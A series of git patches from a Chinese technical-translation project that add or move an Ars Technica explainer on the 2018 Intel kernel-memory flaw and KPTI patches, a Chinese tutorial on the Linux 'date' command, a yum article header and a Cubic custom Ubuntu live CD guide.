--- /dev/null
+++ b/sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md
@@ -0,0 +1,99 @@
+What’s behind the Intel design flaw forcing numerous patches?
+============================================================
+
+### There's obviously a big problem, but we don't know exactly what.
+
+
+![](https://cdn.arstechnica.net/wp-content/uploads/2015/06/intel-48-core-larrabee-probably-640x427.jpg)
+
+
+Both Windows and Linux are receiving significant security updates that can, in the worst case, cause performance to drop by half, to defend against a problem that as yet hasn't been fully disclosed.
+
+Patches to the Linux kernel have been trickling in over the past few weeks. Microsoft has been [testing the Windows updates in the Insider program since November][3], and it is expected to put the alterations into mainstream Windows builds on Patch Tuesday next week. Microsoft's Azure has scheduled maintenance next week, and Amazon's AWS is scheduled for maintenance on Friday—presumably related.
+
+Since the Linux patches [first came to light][4], a clearer picture of what seems to be wrong has emerged. While Linux and Windows differ in many regards, the basic elements of how these two operating systems—and indeed, every other x86 operating system such as FreeBSD and [macOS][5]—handle system memory is the same, because these parts of the operating system are so tightly coupled to the capabilities of the processor.
+
+### Keeping track of addresses
+
+Every byte of memory in a system is implicitly numbered, those numbers being each byte's address. The very earliest operating systems operated using physical memory addresses, but physical memory addresses are inconvenient for lots of reasons. For example, there are often gaps in the addresses, and (particularly on 32-bit systems), physical addresses can be awkward to manipulate, requiring 36-bit numbers, or even larger ones.
+
+Accordingly, modern operating systems all depend on a broad concept called virtual memory. Virtual memory systems allow both programs and the kernels themselves to operate in a simple, clean, uniform environment. Instead of the physical addresses with their gaps and other oddities, every program, and the kernel itself, uses virtual addresses to access memory. These virtual addresses are contiguous—no need to worry about gaps—and sized conveniently to make them easy to manipulate. 32-bit programs see only 32-bit addresses, even if the physical address requires 36-bit or more numbering.
+
+While this virtual addressing is transparent to almost every piece of software, the processor does ultimately need to know which physical memory a virtual address refers to. There's a mapping from virtual addresses to physical addresses, and that's stored in a large data structure called a page table. Operating systems build the page table, using a layout determined by the processor, and the processor and operating system in conjunction use the page table whenever they need to convert between virtual and physical addresses.
+
+This whole mapping process is so important and fundamental to modern operating systems and processors that the processor has dedicated cache—the translation lookaside buffer, or TLB—that stores a certain number of virtual-to-physical mappings so that it can avoid using the full page table every time.
+
+The use of virtual memory gives us a number of useful features beyond the simplicity of addressing. Chief among these is that each individual program is given its own set of virtual addresses, with its own set of virtual to physical mappings. This is the fundamental technique used to provide "protected memory;" one program cannot corrupt or tamper with the memory of another program, because the other program's memory simply isn't part of the first program's mapping.
+
+But these uses of an individual mapping per process, and hence extra page tables, puts pressure on the TLB cache. The TLB isn't very big—typically a few hundred mappings in total—and the more page tables a system uses, the less likely it is that the TLB will include any particular virtual-to-physical translation.
+
+### Half and half
+
+To make the best use of the TLB, every mainstream operating system splits the range of virtual addresses into two. One half of the addresses is used for each program; the other half is used for the kernel. When switching between processes, only half the page table entries change—the ones belonging to the program. The kernel half is common to every program (because there's only one kernel), and so it can use the same page table mapping for every process. This helps the TLB enormously; while it still has to discard mappings belonging to the process' half of memory addresses, it can keep the mappings for the kernel's half.
+
+This design isn't completely set in stone. Work was done on Linux to make it possible to give a 32-bit process the entire range of addresses, with no sharing between the kernel's page table and that of each program. While this gave the programs more address space, it carried a performance cost, because the TLB had to reload the kernel's page table entries every time kernel code needed to run. Accordingly, this approach was never widely used on x86 systems.
+
+One downside of the decision to split the virtual address space between the kernel and each program is that the memory protection is weakened. If the kernel had its own set of page tables and virtual addresses, it would be afforded the same protection as different programs have from one another; the kernel's memory would be simply invisible. But with the split addressing, user programs and the kernel use the same address range, and, in principle, a user program would be able to read and write kernel memory.
+
+To prevent this obviously undesirable situation, the processor and virtual addressing system have a concept of "rings" or "modes." x86 processors have lots of rings, but for this issue, only two are relevant: "user" (ring 3) and "supervisor" (ring 0). When running regular user programs, the processor is put into user mode, ring 3\. When running kernel code, the processor is in ring 0, supervisor mode, also known as kernel mode.
+
+These rings are used to protect the kernel memory from user programs. The page tables aren't just mapping from virtual to physical addresses; they also contain metadata about those addresses, including information about which rings can access an address. The kernel's page table entries are all marked as only being accessible to ring 0; the program's entries are marked as being accessible from any ring. If an attempt is made to access ring 0 memory while in ring 3, the processor blocks the access and generates an exception. The result of this is that user programs, running in ring 3, should not be able to learn anything about the kernel and its ring 0 memory.
+
+At least, that's the theory. The spate of patches and update show that somewhere this has broken down. This is where the big mystery lies.
+
+### Moving between rings
+
+Here's what we do know. Every modern processor performs a certain amount of speculative execution. For example, given some instructions that add two numbers and then store the result in memory, a processor might speculatively do the addition before ascertaining whether the destination in memory is actually accessible and writeable. In the common case, where the location _is_ writeable, the processor managed to save some time, as it did the arithmetic in parallel with figuring out what the destination in memory was. If it discovers that the location isn't accessible—for example, a program trying to write to an address that has no mapping and no physical location at all—then it will generate an exception and the speculative execution is wasted.
+
+Intel processors, specifically—[though not AMD ones][6]—allow speculative execution of ring 3 code that writes to ring 0 memory. The processors _do_ properly block the write, but the speculative execution minutely disturbs the processor state, because certain data will be loaded into cache and the TLB in order to ascertain whether the write should be allowed. This in turn means that some operations will be a few cycles quicker, or a few cycles slower, depending on whether their data is still in cache or not. As well as this, Intel's processors have special features, such as the Software Guard Extensions (SGX) introduced with Skylake processors, that slightly change how attempts to access memory are handled. Again, the processor does still protect ring 0 memory from ring 3 programs, but again, its caches and other internal state are changed, creating measurable differences.
+
+What we don't know, yet, is just how much kernel memory information can be leaked to user programs or how easily that leaking can occur. And which Intel processors are affected? Again it's not entirely clear, but indications are that every Intel chip with speculative execution (which is all the mainstream processors introduced since the Pentium Pro, from 1995) can leak information this way.
+
+The first wind of this problem came from researchers from [Graz Technical University in Austria][7]. The information leakage they discovered was enough to undermine kernel mode Address Space Layout Randomization (kernel ASLR, or KASLR). ASLR is something of a last-ditch effort to prevent the exploitation of [buffer overflows][8]. With ASLR, programs and their data are placed at random memory addresses, which makes it a little harder for attackers to exploit security flaws. KASLR applies that same randomization to the kernel so that the kernel's data (including page tables) and code are randomly located.
+
+The Graz researchers developed [KAISER][9], a set of Linux kernel patches to defend against the problem.
+
+If the problem were just that it enabled the derandomization of ASLR, this probably wouldn't be a huge disaster. ASLR is a nice protection, but it's known to be imperfect. It's meant to be a hurdle for attackers, not an impenetrable barrier. The industry reaction—a fairly major change to both Windows and Linux, developed with some secrecy—suggests that it's not just ASLR that's defeated and that a more general ability to leak information from the kernel has been developed. Indeed, researchers have [started to tweet][10] that they're able to leak and read arbitrary kernel data. Another possibility is that the flaw can be used to escape out of a virtual machine and compromise a hypervisor.
+
+The solution that both the Windows and Linux developers have picked is substantially the same, and derived from that KAISER work: the kernel page table entries are no longer shared with each process. In Linux, this is called Kernel Page Table Isolation (KPTI).
+
+With the patches, the memory address is still split in two; it's just the kernel half is almost empty. It's not quite empty, because a few kernel pieces need to be mapped permanently, whether the processor is running in ring 3 _or_ ring 0, but it's close to empty. This means that even if a malicious user program tries to probe kernel memory and leak information, it will fail—there's simply nothing to leak. The real kernel page tables are only used when the kernel itself is running.
+
+This undermines the very reason for the split address space in the first place. The TLB now needs to clear out any entries related to the real kernel page tables every time it switches to a user program, putting an end to the performance saving that splitting enabled.
+
+The impact of this will vary depending on the workload. Every time a program makes a call into the kernel—to read from disk, to send data to the network, to open a file, and so on—that call will be a little more expensive, since it will force the TLB to be flushed and the real kernel page table to be loaded. Programs that don't use the kernel much might see a hit of perhaps 2-3 percent—there's still some overhead because the kernel always has to run occasionally, to handle things like multitasking.
+
+But workloads that call into the kernel a ton will see much greater performance drop off. In a benchmark, a program that does virtually nothing _other_ than call into the kernel saw [its performance drop by about 50 percent][11]; in other words, each call into the kernel took twice as long with the patch than it did without. Benchmarks that use Linux's loopback networking also see a big hit, such as [17 percent][12] in this Postgres benchmark. Real database workloads using real networking should see lower impact, because with real networks, the overhead of calling into the kernel tends to be dominated by the overhead of using the actual network.
+
+While Intel systems are the ones known to have the defect, they may not be the only ones affected. Some platforms, such as SPARC and IBM's S390, are immune to the problem, as their processor memory management doesn't need the split address space and shared kernel page tables; operating systems on those platforms have always isolated their kernel page tables from user mode ones. But others, such as ARM, may not be so lucky; [comparable patches for ARM Linux][13] are under development.
+
+
+
+[][15][PETER BRIGHT][14]Peter is Technology Editor at Ars. He covers Microsoft, programming and software development, Web technology and browsers, and security. He is based in Brooklyn, NY.
+
+--------------------------------------------------------------------------------
+
+via: https://arstechnica.com/gadgets/2018/01/whats-behind-the-intel-design-flaw-forcing-numerous-patches/
+
+作者:[ PETER BRIGHT ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://arstechnica.com/author/peter-bright/
+[1]:https://arstechnica.com/author/peter-bright/
+[2]:https://arstechnica.com/gadgets/2018/01/whats-behind-the-intel-design-flaw-forcing-numerous-patches/?comments=1
+[3]:https://twitter.com/aionescu/status/930412525111296000
+[4]:https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
+[5]:https://twitter.com/aionescu/status/948609809540046849
+[6]:https://lkml.org/lkml/2017/12/27/2
+[7]:https://gruss.cc/files/kaiser.pdf
+[8]:https://arstechnica.com/information-technology/2015/08/how-security-flaws-work-the-buffer-overflow/
+[9]:https://github.com/IAIK/KAISER
+[10]:https://twitter.com/brainsmoke/status/948561799875502080
+[11]:https://twitter.com/grsecurity/status/947257569906757638
+[12]:https://www.postgresql.org/message-id/20180102222354.qikjmf7dvnjgbkxe@alap3.anarazel.de
+[13]:https://lwn.net/Articles/740393/
+[14]:https://arstechnica.com/author/peter-bright
+[15]:https://arstechnica.com/author/peter-bright
From c8cf9615244b8e520db86b6cbf28b23796d6f613 Mon Sep 17 00:00:00 2001
From: cyleung
Date: Mon, 8 Jan 2018 14:27:44 +0800
Subject: [PATCH 165/371] translating "yum find out path where is package
installed to on CentOS/RHEL"
---
... is package installed to on CentOS-RHEL.md | 29 ++++++++++---------
1 file changed, 15 insertions(+), 14 deletions(-)
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index 01fe3928ce..9f9b896d6a 100644
--- a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -1,7 +1,8 @@
+translating by cyleung
yum find out path where is package installed to on CentOS/RHEL
======
-I have [install htop package on a CentOS/RHEL][1] . I wanted find out where and at what path htop package installed all files. Is there an easy way to tell yum where is package installed on a CentOS/RHEL?
+I have [install htop package on a CentOS/RHEL][1] . I wanted find out where and at what path htop package installed all files. Is there an easy way to tell yum where is package installed on a CentOS/RHEL?
[yum command][2] is an interactive, open source, rpm based, package manager for a CentOS/RHEL and clones. It can automatically perform the following operations for you:
@@ -60,9 +61,9 @@ Resolving Dependencies
---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
--> Finished Dependency Resolution
-
+
Dependencies Resolved
-
+
=======================================================================================
Package Arch Version Repository Size
=======================================================================================
@@ -71,11 +72,11 @@ Installing:
Installing for dependencies:
libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
-
+
Transaction Summary
=======================================================================================
Install 1 Package (+2 Dependent packages)
-
+
Total download size: 630 k
Installed size: 3.1 M
Is this ok [y/d/N]: y
@@ -89,19 +90,19 @@ Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
- Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
- Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
- Installing : yum-utils-1.1.31-42.el7.noarch 3/3
- Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
- Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
- Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
-
+ Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
+ Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
+ Installing : yum-utils-1.1.31-42.el7.noarch 3/3
+ Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
+ Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
+ Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
+
Installed:
yum-utils.noarch 0:1.1.31-42.el7
-
+
Dependency Installed:
libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
-
+
Complete!
```
From 56d8869c311667238b39bdd486d936ecff81230c Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 14:32:35 +0800
Subject: [PATCH 166/371] PRF&PUB:20171205 How to Use the Date Command in
Linux.md
@lujun9972 https://linux.cn/article-9216-1.html
---
...05 How to Use the Date Command in Linux.md | 158 +++++++++++++++++
...05 How to Use the Date Command in Linux.md | 163 ------------------
2 files changed, 158 insertions(+), 163 deletions(-)
create mode 100644 published/20171205 How to Use the Date Command in Linux.md
delete mode 100644 translated/tech/20171205 How to Use the Date Command in Linux.md
diff --git a/published/20171205 How to Use the Date Command in Linux.md b/published/20171205 How to Use the Date Command in Linux.md
new file mode 100644
index 0000000000..007463d87d
--- /dev/null
+++ b/published/20171205 How to Use the Date Command in Linux.md
@@ -0,0 +1,158 @@
+如何使用 date 命令
+======
+
+![](https://www.rosehosting.com/blog/wp-content/uploads/2017/12/How-to-Use-the-Date-Command-in-Linux.jpg)
+
+在本文中, 我们会通过一些案例来演示如何使用 Linux 中的 `date` 命令。`date` 命令可以用户输出/设置系统日期和时间。 `date` 命令很简单, 请参见下面的例子和语法。
+
+默认情况下,当不带任何参数运行 `date` 命令时,它会输出当前系统日期和时间:
+
+```shell
+$ date
+Sat 2 Dec 12:34:12 CST 2017
+```
+
+### 语法
+
+```
+Usage: date [OPTION]... [+FORMAT]
+ or: date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
+以给定格式显示当前时间,或设置系统时间。
+```
+
+### 案例
+
+下面这些案例会向你演示如何使用 `date` 命令来查看前后一段时间的日期时间。
+
+#### 1、 查找 5 周后的日期
+
+```shell
+date -d "5 weeks"
+Sun Jan 7 19:53:50 CST 2018
+```
+
+#### 2、 查找 5 周后又过 4 天的日期
+
+```shell
+date -d "5 weeks 4 days"
+Thu Jan 11 19:55:35 CST 2018
+```
+
+#### 3、 获取下个月的日期
+
+```shell
+date -d "next month"
+Wed Jan 3 19:57:43 CST 2018
+```
+
+#### 4、 获取下周日的日期
+
+```shell
+date -d last-sunday
+Sun Nov 26 00:00:00 CST 2017
+```
+
+`date` 命令还有很多格式化相关的选项, 下面的例子向你演示如何格式化 `date` 命令的输出.
+
+#### 5、 以 `yyyy-mm-dd` 的格式显示日期
+
+```shell
+date +"%F"
+2017-12-03
+```
+
+#### 6、 以 `mm/dd/yyyy` 的格式显示日期
+
+```shell
+date +"%m/%d/%Y"
+12/03/2017
+```
+
+#### 7、 只显示时间
+
+```shell
+date +"%T"
+20:07:04
+```
+
+#### 8、 显示今天是一年中的第几天
+
+```shell
+date +"%j"
+337
+```
+
+#### 9、 与格式化相关的选项
+
+| 格式 | 说明 |
+|---------------|----------------|
+| `%%` | 显示百分号 (`%`)。 |
+| `%a` | 星期的缩写形式 (如: `Sun`)。 |
+| `%A` | 星期的完整形式 (如: `Sunday`)。 |
+| `%b` | 缩写的月份 (如: `Jan`)。 |
+| `%B` | 当前区域的月份全称 (如: `January`)。 |
+| `%c` | 日期以及时间 (如: `Thu Mar 3 23:05:25 2005`)。 |
+| `%C` | 当前世纪;类似 `%Y`, 但是会省略最后两位 (如: `20`)。 |
+| `%d` | 月中的第几日 (如: `01`)。 |
+| `%D` | 日期;效果与 `%m/%d/%y` 一样。 |
+| `%e` | 月中的第几日, 会填充空格;与 `%_d` 一样。 |
+| `%F` | 完整的日期;跟 `%Y-%m-%d` 一样。 |
+| `%g` | 年份的后两位 (参见 `%G`)。 |
+| `%G` | 年份 (参见 `%V`);通常跟 `%V` 连用。 |
+| `%h` | 同 `%b`。 |
+| `%H` | 小时 (`00`..`23`)。 |
+| `%I` | 小时 (`01`..`12`)。 |
+| `%j` | 一年中的第几天 (`001`..`366`)。 |
+| `%k` | 小时, 用空格填充 ( `0`..`23`); 与 `%_H` 一样。 |
+| `%l` | 小时, 用空格填充 ( `1`..`12`); 与 `%_I` 一样。 |
+| `%m` | 月份 (`01`..`12`)。 |
+| `%M` | 分钟 (`00`..`59`)。 |
+| `%n` | 换行。 |
+| `%N` | 纳秒 (`000000000`..`999999999`)。 |
+| `%p` | 当前区域时间是上午 `AM` 还是下午 `PM`;未知则为空。 |
+| `%P` | 类似 `%p`, 但是用小写字母显示。 |
+| `%r` | 当前区域的 12 小时制显示时间 (如: `11:11:04 PM`)。 |
+| `%R` | 24 小时制的小时和分钟;同 `%H:%M`。 |
+| `%s` | 从 1970-01-01 00:00:00 UTC 到现在经历的秒数。 |
+| `%S` | 秒数 (`00`..`60`)。 |
+| `%t` | 制表符。 |
+| `%T` | 时间;同 `%H:%M:%S`。 |
+| `%u` | 星期 (`1`..`7`);1 表示 `星期一`。 |
+| `%U` | 一年中的第几个星期,以周日为一周的开始 (`00`..`53`)。 |
+| `%V` | 一年中的第几个星期,以周一为一周的开始 (`01`..`53`)。 |
+| `%w` | 用数字表示周几 (`0`..`6`); 0 表示 `周日`。 |
+| `%W` | 一年中的第几个星期, 周一为一周的开始 (`00`..`53`)。 |
+| `%x` | 当前区域的日期表示(如: `12/31/99`)。 |
+| `%X` | 当前区域的时间表示 (如: `23:13:48`)。 |
+| `%y` | 年份的后面两位 (`00`..`99`)。 |
+| `%Y` | 年。 |
+| `%z` | 以 `+hhmm` 的数字格式表示时区 (如: `-0400`)。 |
+| `%:z` | 以 `+hh:mm` 的数字格式表示时区 (如: `-04:00`)。 |
+| `%::z` | 以 `+hh:mm:ss` 的数字格式表示时区 (如: `-04:00:00`)。 |
+| `%:::z` | 以数字格式表示时区, 其中 `:` 的个数由你需要的精度来决定 (例如, `-04`, `+05:30`)。 |
+| `%Z` | 时区的字符缩写(例如, `EDT`)。 |
+
+#### 10、 设置系统时间
+
+你也可以使用 `date` 来手工设置系统时间,方法是使用 `--set` 选项, 下面的例子会将系统时间设置成 2017 年 8 月 30 日下午 4 点 22 分。
+
+```shell
+date --set="20170830 16:22"
+```
+
+当然, 如果你使用的是我们的 [VPS 托管服务][1],你总是可以联系并咨询我们的 Linux 专家管理员(通过客服电话或者下工单的方式)关于 `date` 命令的任何东西。他们是 24×7 在线的,会立即向您提供帮助。(LCTT 译注:原文的广告~)
+
+PS. 如果你喜欢这篇帖子,请点击下面的按钮分享或者留言。谢谢。
+
+--------------------------------------------------------------------------------
+
+via: https://www.rosehosting.com/blog/use-the-date-command-in-linux/
+
+作者:[rosehosting][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.rosehosting.com
+[1]:https://www.rosehosting.com/hosting-services.html
diff --git a/translated/tech/20171205 How to Use the Date Command in Linux.md b/translated/tech/20171205 How to Use the Date Command in Linux.md
deleted file mode 100644
index 9564b72e69..0000000000
--- a/translated/tech/20171205 How to Use the Date Command in Linux.md
+++ /dev/null
@@ -1,163 +0,0 @@
-如何使用 Date 命令
-======
-在本文中, 我们会通过一些案例来演示如何使用 linux 中的 date 命令. date 命令可以用户输出/设置系统日期和时间. Date 命令很简单, 请参见下面的例子和语法.
-
-默认情况下,当不带任何参数运行 date 命令时,它会输出当前系统日期和时间:
-
-```shell
-date
-```
-
-```
-Sat 2 Dec 12:34:12 CST 2017
-```
-
-#### 语法
-
-```
-Usage: date [OPTION]... [+FORMAT]
- or: date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
-Display the current time in the given FORMAT, or set the system date.
-
-```
-
-### 案例
-
-下面这些案例会向你演示如何使用 date 命令来查看前后一段时间的日期时间.
-
-#### 1\. 查找5周后的日期
-
-```shell
-date -d "5 weeks"
-Sun Jan 7 19:53:50 CST 2018
-
-```
-
-#### 2\. 查找5周后又过4天的日期
-
-```shell
-date -d "5 weeks 4 days"
-Thu Jan 11 19:55:35 CST 2018
-
-```
-
-#### 3\. 获取下个月的日期
-
-```shell
-date -d "next month"
-Wed Jan 3 19:57:43 CST 2018
-```
-
-#### 4\. 获取下周日的日期
-
-```shell
-date -d last-sunday
-Sun Nov 26 00:00:00 CST 2017
-```
-
-date 命令还有很多格式化相关的选项, 下面的例子向你演示如何格式化 date 命令的输出.
-
-#### 5\. 以 yyyy-mm-dd 的格式显示日期
-
-```shell
-date +"%F"
-2017-12-03
-```
-
-#### 6\. 以 mm/dd/yyyy 的格式显示日期
-
-```shell
-date +"%m/%d/%Y"
-12/03/2017
-
-```
-
-#### 7\. 只显示时间
-
-```shell
-date +"%T"
-20:07:04
-
-```
-
-#### 8\. 显示今天是一年中的第几天
-
-```shell
-date +"%j"
-337
-
-```
-
-#### 9\. 与格式化相关的选项
-
-| **%%** | 百分号 (“**%**“). |
-| **%a** | 星期的缩写形式 (像这样, **Sun**). |
-| **%A** | 星期的完整形式 (像这样, **Sunday**). |
-| **%b** | 缩写的月份 (像这样, **Jan**). |
-| **%B** | 当前区域的月份全称 (像这样, **January**). |
-| **%c** | 日期以及时间 (像这样, **Thu Mar 3 23:05:25 2005**). |
-| **%C** | 本世纪; 类似 **%Y**, 但是会省略最后两位 (像这样, **20**). |
-| **%d** | 月中的第几日 (像这样, **01**). |
-| **%D** | 日期; 效果与 **%m/%d/%y** 一样. |
-| **%e** | 月中的第几日, 会填充空格; 与 **%_d** 一样. |
-| **%F** | 完整的日期; 跟 **%Y-%m-%d** 一样. |
-| **%g** | 年份的后两位 (参见 **%G**). |
-| **%G** | 年份 (参见 **%V**); 通常跟 **%V** 连用. |
-| **%h** | 同 **%b**. |
-| **%H** | 小时 (**00**..**23**). |
-| **%I** | 小时 (**01**..**12**). |
-| **%j** | 一年中的第几天 (**001**..**366**). |
-| **%k** | 小时, 用空格填充 ( **0**..**23**); same as **%_H**. |
-| **%l** | 小时, 用空格填充 ( **1**..**12**); same as **%_I**. |
-| **%m** | 月份 (**01**..**12**). |
-| **%M** | 分钟 (**00**..**59**). |
-| **%n** | 换行. |
-| **%N** | 纳秒 (**000000000**..**999999999**). |
-| **%p** | 当前区域时间是上午 **AM** 还是下午 **PM**; 未知则为空哦. |
-| **%P** | 类似 **%p**, 但是用小写字母现实. |
-| **%r** | 当前区域的12小时制现实时间 (像这样, **11:11:04 PM**). |
-| **%R** | 24-小时制的小时和分钟; 同 **%H:%M**. |
-| **%s** | 从 1970-01-01 00:00:00 UTC 到现在经历的秒数. |
-| **%S** | 秒数 (**00**..**60**). |
-| **%t** | tab 制表符. |
-| **%T** | 时间; 同 **%H:%M:%S**. |
-| **%u** | 星期 (**1**..**7**); 1 表示 **星期一**. |
-| **%U** | 一年中的第几个星期, 以周日为一周的开始 (**00**..**53**). |
-| **%V** | 一年中的第几个星期,以周一为一周的开始 (**01**..**53**). |
-| **%w** | 用数字表示周几 (**0**..**6**); 0 表示 **周日**. |
-| **%W** | 一年中的第几个星期, 周一为一周的开始 (**00**..**53**). |
-| **%x** | Locale’s date representation (像这样, **12/31/99**). |
-| **%X** | Locale’s time representation (像这样, **23:13:48**). |
-| **%y** | 年份的后面两位 (**00**..**99**). |
-| **%Y** | 年. |
-| **%z** | +hhmm 指定数字时区 (像这样, **-0400**). |
-| **%:z** | +hh:mm 指定数字时区 (像这样, **-04:00**). |
-| **%::z** | +hh:mm:ss 指定数字时区 (像这样, **-04:00:00**). |
-| **%:::z** | 指定数字时区, 其中 “**:**” 的个数由你需要的精度来决定 (例如, **-04**, **+05:30**). |
-| **%Z** | 时区的字符缩写(例如, EDT). |
-
-#### 10\. 设置系统时间
-
-你也可以使用 date 来手工设置系统时间,方法是使用 `--set` 选项, 下面的例子会将系统时间设置成2017年8月30日下午4点22分
-
-```shell
-date --set="20170830 16:22"
-
-```
-
-当然, 如果你使用的是我们的 [VPS Hosting services][1], 你总是可以联系并咨询我们的Linux专家管理员 (通过客服电话或者下工单的方式) 关于 date 命令的任何东西. 他们是 24×7 在线的,会立即向您提供帮助.
-
-PS. 如果你喜欢这篇帖子,请点击下面的按钮分享或者留言. 谢谢.
-
---------------------------------------------------------------------------------
-
-via: https://www.rosehosting.com/blog/use-the-date-command-in-linux/
-
-作者:[][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.rosehosting.com
-[1]:https://www.rosehosting.com/hosting-services.html
From 34e88b7ad2fde28a6ab0021c03fea46ed198a826 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Mon, 8 Jan 2018 14:34:51 +0800
Subject: [PATCH 167/371] Translated by stevenzdg988 on 20171030\ How\ To\
Create\ Custom\ Ubuntu\ Live\ CD\ Image.md
---
...w To Create Custom Ubuntu Live CD Image.md | 159 ------------------
...w To Create Custom Ubuntu Live CD Image.md | 157 +++++++++++++++++
2 files changed, 157 insertions(+), 159 deletions(-)
delete mode 100644 sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
create mode 100644 translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
diff --git a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
deleted file mode 100644
index 610efc8739..0000000000
--- a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
+++ /dev/null
@@ -1,159 +0,0 @@
-Translating by stevenzdg988 on How To Create Custom Ubuntu Live CD Image
-======
-![](https://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-720x340.png)
-
-Today let us discuss about how to create custom Ubuntu live cd image (ISO). We already have done this using [**Pinguy Builder**][1]. But, It seems to be discontinued now. I don't see any updates lately from the Pinguy builder official site. Fortunately, I found an alternative tool to create Ubuntu live cd images. Meet **Cubic** , acronym for **C** ustom **Ub** untu **I** SO **C** reator, a GUI application to create a customized bootable Ubuntu Live CD (ISO) image.
-
-Cubic is being actively developed and it offers many options to easily create a customized Ubuntu live cd. It has an integrated command-line chroot environment where you can do all customization, such as installing new packages, Kernels, adding more background wallpapers, adding additional files and folders. It has an intuitive GUI interface that allows effortless navigation (back and forth with a mouse click) during the live image creation process. You can create with a new custom image or modify existing projects. Since it is used to make Ubuntu live images, I believe it can be used in other Ubuntu flavours and derivatives such as Linux Mint.
-
-### Install Cubic
-
-Cubic developer has made a PPA to ease the installation process. To install Cubic on your Ubuntu system, run the following commands one by one in your Terminal:
-```
-sudo apt-add-repository ppa:cubic-wizard/release
-```
-```
-sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 6494C6D6997C215E
-```
-```
-sudo apt update
-```
-```
-sudo apt install cubic
-```
-
-### Create Custom Ubuntu Live Cd Image Using Cubic
-
-Once installed, launch Cubic from application menu or dock. This is how Cubic looks like in my Ubuntu 16.04 LTS desktop system.
-
-Choose a directory for your new project. It is the directory where your files will be saved.
-
-[![][2]][3]
-
-Please note that Cubic will not create a live cd of your system. Instead it just creates a custom live cd from an Ubuntu installation cd. So, you should have a latest ISO image in hand.
-
-Choose the path where you have stored your Ubuntu installation ISO image. Cubic will automatically fill out all details of your custom OS. You can change the details if you want. Click Next to continue.
-
-[![][2]][4]
-
-Next, the compressed Linux file system from the source installation medium will be extracted to your project's directory (i.e **/home/ostechnix/custom_ubuntu** in our case).
-
-[![][2]][5]
-
-Once the file system extracted, you will be landed to chroot environment automatically. If you don't see Terminal prompt, press the ENTER key few times.
-
-[![][2]][6]
-
-From here you can install any additional packages, add background images, add software sources repositories list, add latest Linux kernel to your live cd and all other customization.
-
-For example, I want vim installed in my live cd, so I am going to install it now.
-
-[![][2]][7]
-
-We don't need to "sudo", because we are already in root environment.
-
-Similarly, install any additional Linux Kernel version if you want.
-```
-apt install linux-image-extra-4.10.0-24-generic
-```
-
-Also, you can update software sources list (Add or remove repositories list):
-
-[![][2]][8]
-
-After modifying the sources list, don't forget to run "apt update" command to update the sources list:
-```
-apt update
-```
-
-Also, you can add files or folders to the live cd. Copy the files/folders (right click on them and choose copy or CTRL+C) and right click in the Terminal (inside Cubic window), choose **Paste file(s)** and finally click Copy in the bottom corner of the Cubic wizard.
-
-[![][2]][9]
-
-**Note for Ubuntu 17.10 users: **
-
-In Ubuntu 17.10 system, the DNS lookup may not work in chroot environment. If you are making a custom Ubuntu 17.10 live image, you need to point the correct file resolve.conf file:
-```
-ln -sr /run/systemd/resolve/resolv.conf /run/systemd/resolve/stub-resolv.conf
-
-```
-
-To verify DNS resolution works, run:
-```
-cat /etc/resolv.conf
-ping google.com
-```
-
-Add your own wallpapers if you want. To do so, go to the **/usr/share/backgrounds/** directory,
-```
-cd /usr/share/backgrounds
-```
-
-and drag/drop the images into the Cubic window. Or copy the images and right click on Cubic Terminal window and choose **Paste file(s)** option. Also, make sure you have added the new wallpapers in an XML file under **/usr/share/gnome-background-properties** , so you can choose the newly added image **Change Desktop Background** dialog when you right-click on your desktop. When you made all changes, click Next in Cubic wizard.
-
-In the next, choose Linux Kernel version to use when booting into the new live ISO. If you have installed any additional kernels, they will also listed in this section. Just choose the Kernel you'd like to use in your live cd.
-
-[![][2]][10]
-
